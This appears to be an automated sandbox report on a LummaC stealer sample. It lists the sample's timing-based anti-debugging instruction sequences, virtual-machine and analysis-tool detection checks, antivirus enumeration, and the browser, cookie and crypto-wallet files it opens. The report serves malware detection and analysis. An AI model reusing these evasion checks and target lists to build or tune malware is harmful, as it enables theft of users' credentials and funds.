Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0518 second address: 55E051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E051E second address: 55E052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E052F second address: 55E054B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F450CC4A60Ah 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E054B second address: 55E054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E054F second address: 55E0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0DD5 second address: 55D0E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4AB1Fh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007F450CC4AB20h 0x00000015 call 00007F450CC4AB22h 0x0000001a call 00007F450CC4AB22h 0x0000001f pop ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F450CC4AB21h 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a jmp 00007F450CC4AB1Ch 0x0000002f pushfd 0x00000030 jmp 00007F450CC4AB22h 0x00000035 or cx, 4328h 0x0000003a jmp 00007F450CC4AB1Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F450CC4AB25h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0A31 second address: 55E0A67 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4A60Bh 0x00000008 and ax, 0ADEh 0x0000000d jmp 00007F450CC4A619h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0A67 second address: 55E0A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0A6D second address: 55E0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0A72 second address: 55E0AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007F450CC4AB21h 0x0000000b xor ecx, 3ECC03C6h 0x00000011 jmp 00007F450CC4AB21h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0AAB second address: 55E0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0AAF second address: 55E0AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0AC2 second address: 55E0ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A614h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0ADA second address: 55E0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007F450CC4AB1Eh 0x00000017 xor si, 8128h 0x0000001c jmp 00007F450CC4AB1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007F450CC4AB28h 0x00000028 mov edx, esi 0x0000002a pop ecx 0x0000002b popad 0x0000002c cmp dword ptr [75AF459Ch], 05h 0x00000033 jmp 00007F450CC4AB1Dh 0x00000038 je 00007F457D0F89D3h 0x0000003e pushad 0x0000003f call 00007F450CC4AB1Ch 0x00000044 mov bx, ax 0x00000047 pop ecx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0B5C second address: 55E0B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F450CC4A611h 0x00000010 xor eax, 3FD3EC06h 0x00000016 jmp 00007F450CC4A611h 0x0000001b popfd 0x0000001c mov ch, ABh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0BF6 second address: 55E0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB27h 0x00000009 add eax, 29243AAEh 0x0000000f jmp 00007F450CC4AB29h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F450CC4AB20h 0x0000001b add cx, 5428h 0x00000020 jmp 00007F450CC4AB1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007F450CC4AB29h 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F450CC4AB1Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0D12 second address: 55E0D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0D16 second address: 55E0D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0D1A second address: 55E0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0D74 second address: 55E0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09B9 second address: 55F09BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09BD second address: 55F09C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09C3 second address: 55F09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09C9 second address: 55F09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09CD second address: 55F09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F09D1 second address: 55F0A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F450CC4AB20h 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F450CC4AB21h 0x00000015 jmp 00007F450CC4AB20h 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F450CC4AB1Bh 0x00000021 xor esi, 3ECFC08Eh 0x00000027 jmp 00007F450CC4AB29h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0A42 second address: 55F0A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0A55 second address: 55F0A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F450CC4AB1Eh 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F450CC4AB1Dh 0x00000019 pop eax 0x0000001a mov ebx, 0F64E074h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0A9A second address: 55F0AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F450CC4A60Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0AB9 second address: 55F0B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edi 0x00000006 popad 0x00000007 mov di, si 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F450CC4AB26h 0x00000013 test esi, esi 0x00000015 jmp 00007F450CC4AB20h 0x0000001a je 00007F457D0E83DEh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F450CC4AB27h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0B0E second address: 55F0B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F450CC4A60Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0B41 second address: 55F0B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F457D100457h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F450CC4AB23h 0x00000016 jmp 00007F450CC4AB23h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4AB25h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0B9E second address: 55F0BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A612h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0BBB second address: 55F0BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0BC1 second address: 55F0BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0BC5 second address: 55F0BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB24h 0x00000010 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E53277 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CA608E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E6442E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EE184C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CA80CB rdtsc

0_2_00CA80CB

Source: C:\Users\user\Desktop\file.exe TID: 4052	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3252	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005FA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271288090.000000000167E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2119556889.0000000005FA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CA80CB rdtsc

0_2_00CA80CB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00C8B480 LdrInitializeThunk,

0_2_00C8B480

Source: file.exe, file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213166476.0000000001743000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletm
Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
